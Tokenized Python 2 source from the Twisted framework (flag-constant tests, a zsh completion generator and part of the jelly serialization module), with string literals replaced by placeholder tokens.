value , flag . value ) <EOL> def test_name ( self ) : <EOL> """<STR_LIT>""" <EOL> readWrite = ( self . FXF . READ | self . FXF . WRITE ) <EOL> writeAppend = ( self . FXF . WRITE | self . FXF . APPEND ) <EOL> flag = readWrite ^ writeAppend <EOL> self . assertEqual ( "<STR_LIT>" , flag . name ) <EOL> def test_representation ( self ) : <EOL> """<STR_LIT>""" <EOL> readWrite = ( self . FXF . READ | self . FXF . WRITE ) <EOL> writeAppend = ( self . FXF . WRITE | self . FXF . APPEND ) <EOL> flag = readWrite ^ writeAppend <EOL> self . assertEqual ( "<STR_LIT>" , repr ( flag ) ) <EOL> class FlagConstantNegationTests ( _FlagsTestsMixin , TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_value ( self ) : <EOL> """<STR_LIT>""" <EOL> flag = ~ self . FXF . READ <EOL> self . assertEqual ( <EOL> self . FXF . WRITE . value | <EOL> self . FXF . APPEND . value | <EOL> self . FXF . EXCLUSIVE . value | <EOL> self . FXF . TEXT . value , <EOL> flag . value ) <EOL> flag = ~ self . FXF . WRITE <EOL> self . assertEqual ( <EOL> self . FXF . READ . value | <EOL> self . FXF . APPEND . value | <EOL> self . FXF . EXCLUSIVE . value | <EOL> self . FXF . TEXT . value , <EOL> flag . value ) <EOL> def test_name ( self ) : <EOL> """<STR_LIT>""" <EOL> flag = ~ self . FXF . WRITE <EOL> self . assertEqual ( "<STR_LIT>" , flag . name ) <EOL> def test_representation ( self ) : <EOL> """<STR_LIT>""" <EOL> flag = ~ self . FXF . WRITE <EOL> self . assertEqual ( "<STR_LIT>" , repr ( flag ) ) </s>
<s> """<STR_LIT>""" <EOL> import warnings <EOL> warnings . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , DeprecationWarning , stacklevel = <NUM_LIT:2> ) <EOL> import itertools , sys , commands , os . path <EOL> from twisted . python import reflect , util , usage <EOL> from twisted . application . service import IServiceMaker <EOL> class MyOptions ( usage . Options ) : <EOL> """<STR_LIT>""" <EOL> longdesc = "<STR_LIT>" <EOL> synopsis = "<STR_LIT>" <EOL> optFlags = [ [ "<STR_LIT>" , "<STR_LIT:i>" , <EOL> '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' ] ] <EOL> optParameters = [ [ "<STR_LIT>" , "<STR_LIT:d>" , None , <EOL> "<STR_LIT>" ] ] <EOL> def postOptions ( self ) : <EOL> if self [ '<STR_LIT>' ] and self [ '<STR_LIT>' ] : <EOL> raise usage . UsageError , "<STR_LIT>" "<STR_LIT>" <EOL> if not self [ '<STR_LIT>' ] and not self [ '<STR_LIT>' ] : <EOL> raise usage . UsageError , "<STR_LIT>" <EOL> if self [ '<STR_LIT>' ] and not os . path . isdir ( self [ '<STR_LIT>' ] ) : <EOL> raise usage . UsageError , "<STR_LIT>" % self [ '<STR_LIT>' ] <EOL> class Builder : <EOL> def __init__ ( self , cmd_name , options , file ) : <EOL> """<STR_LIT>""" <EOL> self . cmd_name = cmd_name <EOL> self . options = options <EOL> self . file = file <EOL> def write ( self ) : <EOL> """<STR_LIT>""" <EOL> self . file . write ( '<STR_LIT>' % ( self . cmd_name , ) ) <EOL> gen = ArgumentsGenerator ( self . cmd_name , self . options , self . file ) <EOL> gen . write ( ) <EOL> class SubcommandBuilder ( Builder ) : <EOL> """<STR_LIT>""" <EOL> interface = None <EOL> subcmdLabel = None <EOL> def write ( self ) : <EOL> """<STR_LIT>""" <EOL> self . file . write ( '<STR_LIT>' % ( self . cmd_name , ) ) <EOL> self . file . write ( '<STR_LIT>' ) <EOL> from twisted import plugin as newplugin <EOL> plugins = newplugin . getPlugins ( self . interface ) <EOL> for p in plugins : <EOL> self . file . write ( '<STR_LIT>' % ( p . tapname , p . description ) ) <EOL> self . file . write ( "<STR_LIT>" ) <EOL> self . options . 
__class__ . zsh_extras = [ '<STR_LIT>' ] <EOL> gen = ArgumentsGenerator ( self . cmd_name , self . options , self . file ) <EOL> gen . write ( ) <EOL> self . file . write ( """<STR_LIT>""" % ( self . subcmdLabel , ) ) <EOL> plugins = newplugin . getPlugins ( self . interface ) <EOL> for p in plugins : <EOL> self . file . write ( p . tapname + "<STR_LIT>" ) <EOL> gen = ArgumentsGenerator ( p . tapname , p . options ( ) , self . file ) <EOL> gen . write ( ) <EOL> self . file . write ( "<STR_LIT>" ) <EOL> self . file . write ( "<STR_LIT>" "<STR_LIT>" ) <EOL> class MktapBuilder ( SubcommandBuilder ) : <EOL> """<STR_LIT>""" <EOL> interface = IServiceMaker <EOL> subcmdLabel = '<STR_LIT>' <EOL> class TwistdBuilder ( SubcommandBuilder ) : <EOL> """<STR_LIT>""" <EOL> interface = IServiceMaker <EOL> subcmdLabel = '<STR_LIT>' <EOL> class ArgumentsGenerator : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , cmd_name , options , file ) : <EOL> """<STR_LIT>""" <EOL> self . cmd_name = cmd_name <EOL> self . options = options <EOL> self . file = file <EOL> self . altArgDescr = { } <EOL> self . actionDescr = { } <EOL> self . multiUse = [ ] <EOL> self . mutuallyExclusive = [ ] <EOL> self . actions = { } <EOL> self . extras = [ ] <EOL> aCL = reflect . accumulateClassList <EOL> aCD = reflect . accumulateClassDict <EOL> aCD ( options . __class__ , '<STR_LIT>' , self . altArgDescr ) <EOL> aCD ( options . __class__ , '<STR_LIT>' , self . actionDescr ) <EOL> aCL ( options . __class__ , '<STR_LIT>' , self . multiUse ) <EOL> aCL ( options . __class__ , '<STR_LIT>' , <EOL> self . mutuallyExclusive ) <EOL> aCD ( options . __class__ , '<STR_LIT>' , self . actions ) <EOL> aCL ( options . __class__ , '<STR_LIT>' , self . extras ) <EOL> optFlags = [ ] <EOL> optParams = [ ] <EOL> aCL ( options . __class__ , '<STR_LIT>' , optFlags ) <EOL> aCL ( options . 
__class__ , '<STR_LIT>' , optParams ) <EOL> for i , optList in enumerate ( optFlags ) : <EOL> if len ( optList ) != <NUM_LIT:3> : <EOL> optFlags [ i ] = util . padTo ( <NUM_LIT:3> , optList ) <EOL> for i , optList in enumerate ( optParams ) : <EOL> if len ( optList ) != <NUM_LIT:4> : <EOL> optParams [ i ] = util . padTo ( <NUM_LIT:4> , optList ) <EOL> self . optFlags = optFlags <EOL> self . optParams = optParams <EOL> optParams_d = { } <EOL> for optList in optParams : <EOL> optParams_d [ optList [ <NUM_LIT:0> ] ] = optList [ <NUM_LIT:1> : ] <EOL> self . optParams_d = optParams_d <EOL> optFlags_d = { } <EOL> for optList in optFlags : <EOL> optFlags_d [ optList [ <NUM_LIT:0> ] ] = optList [ <NUM_LIT:1> : ] <EOL> self . optFlags_d = optFlags_d <EOL> optAll_d = { } <EOL> optAll_d . update ( optParams_d ) <EOL> optAll_d . update ( optFlags_d ) <EOL> self . optAll_d = optAll_d <EOL> self . addAdditionalOptions ( ) <EOL> self . verifyZshNames ( ) <EOL> self . excludes = self . makeExcludesDict ( ) <EOL> def write ( self ) : <EOL> """<STR_LIT>""" <EOL> self . writeHeader ( ) <EOL> self . writeExtras ( ) <EOL> self . writeOptions ( ) <EOL> self . writeFooter ( ) <EOL> def writeHeader ( self ) : <EOL> """<STR_LIT>""" <EOL> self . file . write ( '<STR_LIT>' ) <EOL> def writeOptions ( self ) : <EOL> """<STR_LIT>""" <EOL> optNames = self . optAll_d . keys ( ) <EOL> optNames . sort ( ) <EOL> for longname in optNames : <EOL> self . writeOpt ( longname ) <EOL> def writeExtras ( self ) : <EOL> """<STR_LIT>""" <EOL> for s in self . extras : <EOL> self . file . write ( escape ( s ) ) <EOL> self . file . write ( '<STR_LIT>' ) <EOL> def writeFooter ( self ) : <EOL> """<STR_LIT>""" <EOL> self . file . write ( '<STR_LIT>' ) <EOL> def verifyZshNames ( self ) : <EOL> """<STR_LIT>""" <EOL> def err ( name ) : <EOL> raise ValueError , "<STR_LIT>" "<STR_LIT>" % ( <EOL> name , self . cmd_name ) <EOL> for name in itertools . chain ( self . altArgDescr , self . actionDescr , <EOL> self . 
actions , self . multiUse ) : <EOL> if name not in self . optAll_d : <EOL> err ( name ) <EOL> for seq in self . mutuallyExclusive : <EOL> for name in seq : <EOL> if name not in self . optAll_d : <EOL> err ( name ) <EOL> def excludeStr ( self , longname , buildShort = False ) : <EOL> """<STR_LIT>""" <EOL> if longname in self . excludes : <EOL> exclusions = self . excludes [ longname ] [ : ] <EOL> else : <EOL> exclusions = [ ] <EOL> if longname not in self . multiUse : <EOL> if buildShort is False : <EOL> short = self . getShortOption ( longname ) <EOL> if short is not None : <EOL> exclusions . append ( short ) <EOL> else : <EOL> exclusions . append ( longname ) <EOL> if not exclusions : <EOL> return '<STR_LIT>' <EOL> strings = [ ] <EOL> for optName in exclusions : <EOL> if len ( optName ) == <NUM_LIT:1> : <EOL> strings . append ( "<STR_LIT:->" + optName ) <EOL> else : <EOL> strings . append ( "<STR_LIT>" + optName ) <EOL> return "<STR_LIT>" % "<STR_LIT:U+0020>" . join ( strings ) <EOL> def makeExcludesDict ( self ) : <EOL> """<STR_LIT>""" <EOL> longToShort = { } <EOL> for optList in itertools . chain ( self . optParams , self . optFlags ) : <EOL> try : <EOL> if optList [ <NUM_LIT:1> ] != None : <EOL> longToShort [ optList [ <NUM_LIT:0> ] ] = optList [ <NUM_LIT:1> ] <EOL> except IndexError : <EOL> pass <EOL> excludes = { } <EOL> for lst in self . mutuallyExclusive : <EOL> for i , longname in enumerate ( lst ) : <EOL> tmp = [ ] <EOL> tmp . extend ( lst [ : i ] ) <EOL> tmp . extend ( lst [ i + <NUM_LIT:1> : ] ) <EOL> for name in tmp [ : ] : <EOL> if name in longToShort : <EOL> tmp . append ( longToShort [ name ] ) <EOL> if longname in excludes : <EOL> excludes [ longname ] . extend ( tmp ) <EOL> else : <EOL> excludes [ longname ] = tmp <EOL> return excludes <EOL> def writeOpt ( self , longname ) : <EOL> """<STR_LIT>""" <EOL> if longname in self . 
optFlags_d : <EOL> long_field = "<STR_LIT>" % longname <EOL> else : <EOL> long_field = "<STR_LIT>" % longname <EOL> short = self . getShortOption ( longname ) <EOL> if short != None : <EOL> short_field = "<STR_LIT:->" + short <EOL> else : <EOL> short_field = '<STR_LIT>' <EOL> descr = self . getDescription ( longname ) <EOL> descr_field = descr . replace ( "<STR_LIT:[>" , "<STR_LIT>" ) <EOL> descr_field = descr_field . replace ( "<STR_LIT:]>" , "<STR_LIT>" ) <EOL> descr_field = '<STR_LIT>' % descr_field <EOL> if longname in self . actionDescr : <EOL> actionDescr_field = self . actionDescr [ longname ] <EOL> else : <EOL> actionDescr_field = descr <EOL> action_field = self . getAction ( longname ) <EOL> if longname in self . multiUse : <EOL> multi_field = '<STR_LIT:*>' <EOL> else : <EOL> multi_field = '<STR_LIT>' <EOL> longExclusions_field = self . excludeStr ( longname ) <EOL> if short : <EOL> shortExclusions_field = self . excludeStr ( longname , buildShort = True ) <EOL> self . file . write ( escape ( '<STR_LIT>' % ( shortExclusions_field , <EOL> multi_field , short_field , descr_field , action_field ) ) ) <EOL> self . file . write ( '<STR_LIT>' ) <EOL> self . file . write ( escape ( '<STR_LIT>' % ( longExclusions_field , <EOL> multi_field , long_field , descr_field , action_field ) ) ) <EOL> self . file . write ( '<STR_LIT>' ) <EOL> def getAction ( self , longname ) : <EOL> """<STR_LIT>""" <EOL> if longname in self . actions : <EOL> if callable ( self . actions [ longname ] ) : <EOL> action = self . actions [ longname ] ( ) <EOL> else : <EOL> action = self . actions [ longname ] <EOL> return "<STR_LIT>" % ( self . getActionDescr ( longname ) , action ) <EOL> if longname in self . optParams_d : <EOL> return '<STR_LIT>' % self . getActionDescr ( longname ) <EOL> return '<STR_LIT>' <EOL> def getActionDescr ( self , longname ) : <EOL> """<STR_LIT>""" <EOL> if longname in self . actionDescr : <EOL> return self . 
actionDescr [ longname ] <EOL> else : <EOL> return longname <EOL> def getDescription ( self , longname ) : <EOL> """<STR_LIT>""" <EOL> if longname in self . altArgDescr : <EOL> return self . altArgDescr [ longname ] <EOL> try : <EOL> descr = self . optFlags_d [ longname ] [ <NUM_LIT:1> ] <EOL> except KeyError : <EOL> try : <EOL> descr = self . optParams_d [ longname ] [ <NUM_LIT:2> ] <EOL> except KeyError : <EOL> descr = None <EOL> if descr is not None : <EOL> return descr <EOL> longMangled = longname . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) <EOL> obj = getattr ( self . options , '<STR_LIT>' % longMangled , None ) <EOL> if obj : <EOL> descr = descrFromDoc ( obj ) <EOL> if descr is not None : <EOL> return descr <EOL> return longname <EOL> def getShortOption ( self , longname ) : <EOL> """<STR_LIT>""" <EOL> optList = self . optAll_d [ longname ] <EOL> try : <EOL> return optList [ <NUM_LIT:0> ] or None <EOL> except IndexError : <EOL> pass <EOL> def addAdditionalOptions ( self ) : <EOL> """<STR_LIT>""" <EOL> methodsDict = { } <EOL> reflect . accumulateMethods ( self . options , methodsDict , '<STR_LIT>' ) <EOL> methodToShort = { } <EOL> for name in methodsDict . copy ( ) : <EOL> if len ( name ) == <NUM_LIT:1> : <EOL> methodToShort [ methodsDict [ name ] ] = name <EOL> del methodsDict [ name ] <EOL> for methodName , methodObj in methodsDict . items ( ) : <EOL> longname = methodName . replace ( '<STR_LIT:_>' , '<STR_LIT:->' ) <EOL> if longname in self . optAll_d : <EOL> continue <EOL> descr = self . getDescription ( longname ) <EOL> short = None <EOL> if methodObj in methodToShort : <EOL> short = methodToShort [ methodObj ] <EOL> reqArgs = methodObj . im_func . func_code . co_argcount <EOL> if reqArgs == <NUM_LIT:2> : <EOL> self . optParams . append ( [ longname , short , None , descr ] ) <EOL> self . optParams_d [ longname ] = [ short , None , descr ] <EOL> self . optAll_d [ longname ] = [ short , None , descr ] <EOL> elif reqArgs == <NUM_LIT:1> : <EOL> self . 
optFlags . append ( [ longname , short , descr ] ) <EOL> self . optFlags_d [ longname ] = [ short , descr ] <EOL> self . optAll_d [ longname ] = [ short , None , descr ] <EOL> else : <EOL> raise TypeError , '<STR_LIT>' '<STR_LIT>' % ( methodObj , ) <EOL> def descrFromDoc ( obj ) : <EOL> """<STR_LIT>""" <EOL> if obj . __doc__ is None : <EOL> return None <EOL> lines = obj . __doc__ . split ( "<STR_LIT:\n>" ) <EOL> descr = None <EOL> try : <EOL> if lines [ <NUM_LIT:0> ] != "<STR_LIT>" and not lines [ <NUM_LIT:0> ] . isspace ( ) : <EOL> descr = lines [ <NUM_LIT:0> ] . lstrip ( ) <EOL> elif lines [ <NUM_LIT:1> ] != "<STR_LIT>" and not lines [ <NUM_LIT:1> ] . isspace ( ) : <EOL> descr = lines [ <NUM_LIT:1> ] . lstrip ( ) <EOL> except IndexError : <EOL> pass <EOL> return descr <EOL> def firstLine ( s ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> i = s . index ( '<STR_LIT:\n>' ) <EOL> return s [ : i ] <EOL> except ValueError : <EOL> return s <EOL> def escape ( str ) : <EOL> """<STR_LIT>""" <EOL> return commands . mkarg ( str ) [ <NUM_LIT:1> : ] <EOL> def siteFunctionsPath ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> cmd = "<STR_LIT>" <EOL> output = commands . getoutput ( cmd ) <EOL> if os . path . 
isdir ( output ) : <EOL> return output <EOL> except : <EOL> pass <EOL> generateFor = [ ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> specialBuilders = { '<STR_LIT>' : MktapBuilder , <EOL> '<STR_LIT>' : TwistdBuilder } <EOL> def makeCompFunctionFiles ( out_path , generateFor = generateFor , <EOL> specialBuilders = specialBuilders ) : <EOL> """<STR_LIT>""" <EOL> skips = [ ] <EOL> for cmd_name , module_name , class_name in generateFor : <EOL> if module_name is None : <EOL> f = _openCmdFile ( out_path , cmd_name ) <EOL> f . close ( ) <EOL> continue <EOL> try : <EOL> m = __import__ ( '<STR_LIT:%s>' % ( module_name , ) , None , None , ( class_name ) ) <EOL> f = _openCmdFile ( out_path , cmd_name ) <EOL> o = getattr ( m , class_name ) ( ) <EOL> if cmd_name in specialBuilders : <EOL> b = specialBuilders [ cmd_name ] ( cmd_name , o , f ) <EOL> b . write ( ) <EOL> else : <EOL> b = Builder ( cmd_name , o , f ) <EOL> b . write ( ) <EOL> except Exception , e : <EOL> skips . append ( ( cmd_name , e ) ) <EOL> continue <EOL> return skips <EOL> def _openCmdFile ( out_path , cmd_name ) : <EOL> return file ( os . path . join ( out_path , '<STR_LIT:_>' + cmd_name ) , '<STR_LIT:w>' ) <EOL> def run ( ) : <EOL> options = MyOptions ( ) <EOL> try : <EOL> options . parseOptions ( sys . argv [ <NUM_LIT:1> : ] ) <EOL> except usage . 
UsageError , e : <EOL> print e <EOL> print options . getUsage ( ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> if options [ '<STR_LIT>' ] : <EOL> import twisted <EOL> dir = os . path . join ( os . path . dirname ( twisted . __file__ ) , "<STR_LIT>" , "<STR_LIT>" ) <EOL> skips = makeCompFunctionFiles ( dir ) <EOL> else : <EOL> skips = makeCompFunctionFiles ( options [ '<STR_LIT>' ] ) <EOL> for cmd_name , error in skips : <EOL> sys . stderr . write ( "<STR_LIT>" "<STR_LIT>" % ( cmd_name , ) ) <EOL> sys . stderr . write ( str ( error ) + '<STR_LIT:\n>' ) <EOL> if skips : <EOL> sys . exit ( <NUM_LIT:3> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> run ( ) </s>
<s> """<STR_LIT>""" <EOL> import pickle <EOL> import types <EOL> import warnings <EOL> from types import StringType <EOL> from types import UnicodeType <EOL> from types import IntType <EOL> from types import TupleType <EOL> from types import ListType <EOL> from types import LongType <EOL> from types import FloatType <EOL> from types import FunctionType <EOL> from types import MethodType <EOL> from types import ModuleType <EOL> from types import DictionaryType <EOL> from types import InstanceType <EOL> from types import NoneType <EOL> from types import ClassType <EOL> import copy <EOL> import datetime <EOL> from types import BooleanType <EOL> try : <EOL> import decimal <EOL> except ImportError : <EOL> decimal = None <EOL> try : <EOL> _set = set <EOL> except NameError : <EOL> _set = None <EOL> try : <EOL> warnings . filterwarnings ( "<STR_LIT:ignore>" , category = DeprecationWarning , <EOL> message = "<STR_LIT>" , append = True ) <EOL> import sets as _sets <EOL> finally : <EOL> warnings . filters . pop ( ) <EOL> from zope . interface import implements <EOL> from twisted . python . reflect import namedObject , qual <EOL> from twisted . persisted . crefutil import NotKnown , _Tuple , _InstanceMethod <EOL> from twisted . persisted . crefutil import _DictKeyAndValue , _Dereference <EOL> from twisted . persisted . crefutil import _Container <EOL> from twisted . python . compat import reduce <EOL> from twisted . spread . 
interfaces import IJellyable , IUnjellyable <EOL> DictTypes = ( DictionaryType , ) <EOL> None_atom = "<STR_LIT:None>" <EOL> class_atom = "<STR_LIT:class>" <EOL> module_atom = "<STR_LIT>" <EOL> function_atom = "<STR_LIT>" <EOL> dereference_atom = '<STR_LIT>' <EOL> persistent_atom = '<STR_LIT>' <EOL> reference_atom = '<STR_LIT>' <EOL> dictionary_atom = "<STR_LIT>" <EOL> list_atom = '<STR_LIT:list>' <EOL> set_atom = '<STR_LIT>' <EOL> tuple_atom = "<STR_LIT>" <EOL> instance_atom = '<STR_LIT>' <EOL> frozenset_atom = '<STR_LIT>' <EOL> unpersistable_atom = "<STR_LIT>" <EOL> unjellyableRegistry = { } <EOL> unjellyableFactoryRegistry = { } <EOL> _NO_STATE = object ( ) <EOL> def _newInstance ( cls , state = _NO_STATE ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( cls , types . ClassType ) : <EOL> inst = cls . __new__ ( cls ) <EOL> if state is not _NO_STATE : <EOL> inst . __dict__ . update ( state ) <EOL> else : <EOL> if state is not _NO_STATE : <EOL> inst = InstanceType ( cls , state ) <EOL> else : <EOL> inst = InstanceType ( cls ) <EOL> return inst <EOL> def _maybeClass ( classnamep ) : <EOL> try : <EOL> object <EOL> except NameError : <EOL> isObject = <NUM_LIT:0> <EOL> else : <EOL> isObject = isinstance ( classnamep , type ) <EOL> if isinstance ( classnamep , ClassType ) or isObject : <EOL> return qual ( classnamep ) <EOL> return classnamep <EOL> def setUnjellyableForClass ( classname , unjellyable ) : <EOL> """<STR_LIT>""" <EOL> global unjellyableRegistry <EOL> classname = _maybeClass ( classname ) <EOL> unjellyableRegistry [ classname ] = unjellyable <EOL> globalSecurity . allowTypes ( classname ) <EOL> def setUnjellyableFactoryForClass ( classname , copyFactory ) : <EOL> """<STR_LIT>""" <EOL> global unjellyableFactoryRegistry <EOL> classname = _maybeClass ( classname ) <EOL> unjellyableFactoryRegistry [ classname ] = copyFactory <EOL> globalSecurity . 
allowTypes ( classname )  # tail of a definition that begins before this chunk


def setUnjellyableForClassTree(module, baseClass, prefix=None):
    """
    Register every class found in C{module} that subclasses C{baseClass}
    as unjellyable under a prefixed dotted name.  C{prefix} defaults to
    the module's own name.
    """
    if prefix is None:
        prefix = module.__name__
    if prefix:
        prefix = "<STR_LIT>" % prefix
    for i in dir(module):
        i_ = getattr(module, i)
        # Only old-style classes are scanned here.
        if type(i_) == types.ClassType:
            if issubclass(i_, baseClass):
                setUnjellyableForClass('<STR_LIT>' % (prefix, i), i_)


def getInstanceState(inst, jellier):
    """
    Serialize an instance: use __getstate__() when available, otherwise
    the instance __dict__, wrapped in the jellier's reference-tracking
    machinery.
    """
    if hasattr(inst, "<STR_LIT>"):
        state = inst.__getstate__()
    else:
        state = inst.__dict__
    sxp = jellier.prepare(inst)
    sxp.extend([qual(inst.__class__), jellier.jelly(state)])
    return jellier.preserve(inst, sxp)


def setInstanceState(inst, unjellier, jellyList):
    """
    Restore an instance's state from a jelly list: the state expression
    is unjellied and handed to __setstate__() when available, otherwise
    assigned directly to __dict__.  Returns the instance.
    """
    state = unjellier.unjelly(jellyList[<NUM_LIT:1>])
    if hasattr(inst, "<STR_LIT>"):
        inst.__setstate__(state)
    else:
        inst.__dict__ = state
    return inst


class Unpersistable:
    """
    Placeholder stored in place of an object that could not be
    (de)serialized; carries a human-readable reason.
    """

    def __init__(self, reason):
        """
        Remember why the original object was unpersistable.
        """
        self.reason = reason

    def __repr__(self):
        return "<STR_LIT>" % repr(self.reason)


class Jellyable:
    """
    Mixin that makes a class serializable by the jellier; the serialized
    state defaults to the instance __dict__.
    """
    implements(IJellyable)

    def getStateFor(self, jellier):
        return self.__dict__

    def jellyFor(self, jellier):
        """
        Produce the s-expression for this instance: qualified class name
        followed by the jellied state, with cycle bookkeeping handled by
        prepare()/preserve().
        """
        sxp = jellier.prepare(self)
        sxp.extend([
            qual(self.__class__),
            jellier.jelly(self.getStateFor(jellier))])
        return jellier.preserve(self, sxp)


class Unjellyable:
    """
    Mixin for classes that can be rebuilt from a jelly expression; the
    unjellied state is applied directly to the instance __dict__.
    """
    implements(IUnjellyable)

    def setStateFor(self, unjellier, state):
        self.__dict__ = state

    def unjellyFor(self, unjellier, jellyList):
        """
        Rebuild this instance from C{jellyList}: unjelly the state
        expression and apply it via setStateFor().
        """
        state = unjellier.unjelly(jellyList[<NUM_LIT:1>])
        self.setStateFor(unjellier, state)
        return self


class _Jellier:
    """
    Serializer: converts live objects into jelly s-expressions, tracking
    object identity so shared and cyclic references are emitted once.
    """

    def __init__(self, taster, persistentStore, invoker):
        """
        C{taster} is the security policy; C{persistentStore}, if set, is
        given first chance to externalize arbitrary instances.
        """
        self.taster = taster
        # id(obj) -> list that will hold the object's serialized form.
        self.preserved = {}
        # id(obj) -> [dereference_atom, refid] for already-referenced objects.
        self.cooked = {}
        self.cooker = {}
        self._ref_id = <NUM_LIT:1>
        self.persistentStore = persistentStore
        self.invoker = invoker

    def _cook(self, object):
        """
        Promote an already-serialized object to a named reference so later
        occurrences can point back at it: rewrite its list in place to
        [reference_atom, refid, original] and record the dereference form.
        """
        aList = self.preserved[id(object)]
        newList = copy.copy(aList)
        refid = self._ref_id
        self._ref_id = self._ref_id + <NUM_LIT:1>
        aList[:] = [reference_atom, refid, newList]
        self.cooked[id(object)] = [dereference_atom, refid]
        return aList

    def prepare(self, object):
        """
        Begin serializing a mutable object: reserve its slot (so cycles
        can be detected while the body is still being built) and return a
        fresh list for the caller to fill.
        """
        self.preserved[id(object)] = []
        # Hold a strong reference so id() stays unique for the duration.
        self.cooker[id(object)] = object
        return []

    def preserve(self, object, sexp):
        """
        Finish serializing an object begun with prepare(); if it was
        cooked in the meantime (a cycle), splice the body into the
        reference wrapper instead.
        """
        if id(object) in self.cooked:
            self.preserved[id(object)][<NUM_LIT:2>] = sexp
            sexp = self.preserved[id(object)]
        else:
            self.preserved[id(object)] = sexp
        return sexp

    # Immutable leaf types (informational; not consulted below).
    constantTypes = {types.StringType: <NUM_LIT:1>, types.IntType: <NUM_LIT:1>,
                     types.FloatType: <NUM_LIT:1>, types.LongType: <NUM_LIT:1>}

    def _checkMutable(self, obj):
        """
        Return the dereference expression for C{obj} if it has been (or
        is being) serialized already; otherwise fall through to None.
        """
        objId = id(obj)
        if objId in self.cooked:
            return self.cooked[objId]
        if objId in self.preserved:
            self._cook(obj)
            return self.cooked[objId]

    def jelly(self, obj):
        """
        Serialize C{obj} to a jelly s-expression, dispatching on its
        exact type.  Raises InsecureJelly when the taster rejects the
        type or class.
        """
        if isinstance(obj, Jellyable):
            preRef = self._checkMutable(obj)
            if preRef:
                return preRef
            return obj.jellyFor(self)
        objType = type(obj)
        if self.taster.isTypeAllowed(qual(objType)):
            # Primitive immutables serialize as themselves.
            if ((objType is StringType) or
                (objType is IntType) or
                (objType is LongType) or
                (objType is FloatType)):
                return obj
            elif objType is MethodType:
                return ["<STR_LIT>",
                        obj.im_func.__name__,
                        self.jelly(obj.im_self),
                        self.jelly(obj.im_class)]
            elif UnicodeType and objType is UnicodeType:
                return ['<STR_LIT>', obj.encode('<STR_LIT>')]
            elif objType is NoneType:
                return ['<STR_LIT:None>']
            elif objType is FunctionType:
                name = obj.__name__
                return ['<STR_LIT>', str(pickle.whichmodule(obj, obj.__name__))
                        + '<STR_LIT:.>' +
                        name]
            elif objType is ModuleType:
                return ['<STR_LIT>', obj.__name__]
            elif objType is BooleanType:
                return ['<STR_LIT>', obj and '<STR_LIT:true>' or '<STR_LIT:false>']
            elif objType is datetime.datetime:
                # Timezone-aware values are not supported.
                if obj.tzinfo:
                    raise NotImplementedError(
                        "<STR_LIT>")
                return ['<STR_LIT>', '<STR_LIT>' % (
                    obj.year, obj.month, obj.day, obj.hour,
                    obj.minute, obj.second, obj.microsecond)]
            elif objType is datetime.time:
                if obj.tzinfo:
                    raise NotImplementedError(
                        "<STR_LIT>")
                return ['<STR_LIT:time>', '<STR_LIT>' % (obj.hour, obj.minute,
                                                         obj.second, obj.microsecond)]
            elif objType is datetime.date:
                return ['<STR_LIT:date>', '<STR_LIT>' % (obj.year, obj.month, obj.day)]
            elif objType is datetime.timedelta:
                return ['<STR_LIT>', '<STR_LIT>' % (obj.days, obj.seconds,
                                                    obj.microseconds)]
            elif objType is ClassType or issubclass(objType, type):
                return ['<STR_LIT:class>', qual(obj)]
            elif decimal is not None and objType is decimal.Decimal:
                return self.jelly_decimal(obj)
            else:
                # Mutable containers and arbitrary instances: check for a
                # previous occurrence first, then build with cycle support.
                preRef = self._checkMutable(obj)
                if preRef:
                    return preRef
                sxp = self.prepare(obj)
                if objType is ListType:
                    sxp.extend(self._jellyIterable(list_atom, obj))
                elif objType is TupleType:
                    sxp.extend(self._jellyIterable(tuple_atom, obj))
                elif objType in DictTypes:
                    sxp.append(dictionary_atom)
                    for key, val in obj.items():
                        sxp.append([self.jelly(key), self.jelly(val)])
                elif (_set is not None and objType is set or
                      objType is _sets.Set):
                    sxp.extend(self._jellyIterable(set_atom, obj))
                elif (_set is not None and objType is frozenset or
                      objType is _sets.ImmutableSet):
                    sxp.extend(self._jellyIterable(frozenset_atom, obj))
                else:
                    className = qual(obj.__class__)
                    persistent = None
                    if self.persistentStore:
                        persistent = self.persistentStore(obj, self)
                    if persistent is not None:
                        sxp.append(persistent_atom)
                        sxp.append(persistent)
                    elif self.taster.isClassAllowed(obj.__class__):
                        sxp.append(className)
                        if hasattr(obj, "<STR_LIT>"):
                            state = obj.__getstate__()
                        else:
                            state = obj.__dict__
                        sxp.append(self.jelly(state))
                    else:
                        self.unpersistable(
                            "<STR_LIT>" %
                            qual(obj.__class__), sxp)
                return self.preserve(obj, sxp)
        else:
            if objType is InstanceType:
                raise InsecureJelly("<STR_LIT>" %
                                    (obj.__class__, obj))
            raise InsecureJelly("<STR_LIT>" %
                                (objType, obj))

    def _jellyIterable(self, atom, obj):
        """
        Yield C{atom} followed by the jellied form of each item of C{obj}.
        """
        yield atom
        for item in obj:
            yield self.jelly(item)

    def jelly_decimal(self, d):
        """
        Serialize a Decimal as its (signed) digits collapsed into one
        integer, plus the exponent.
        """
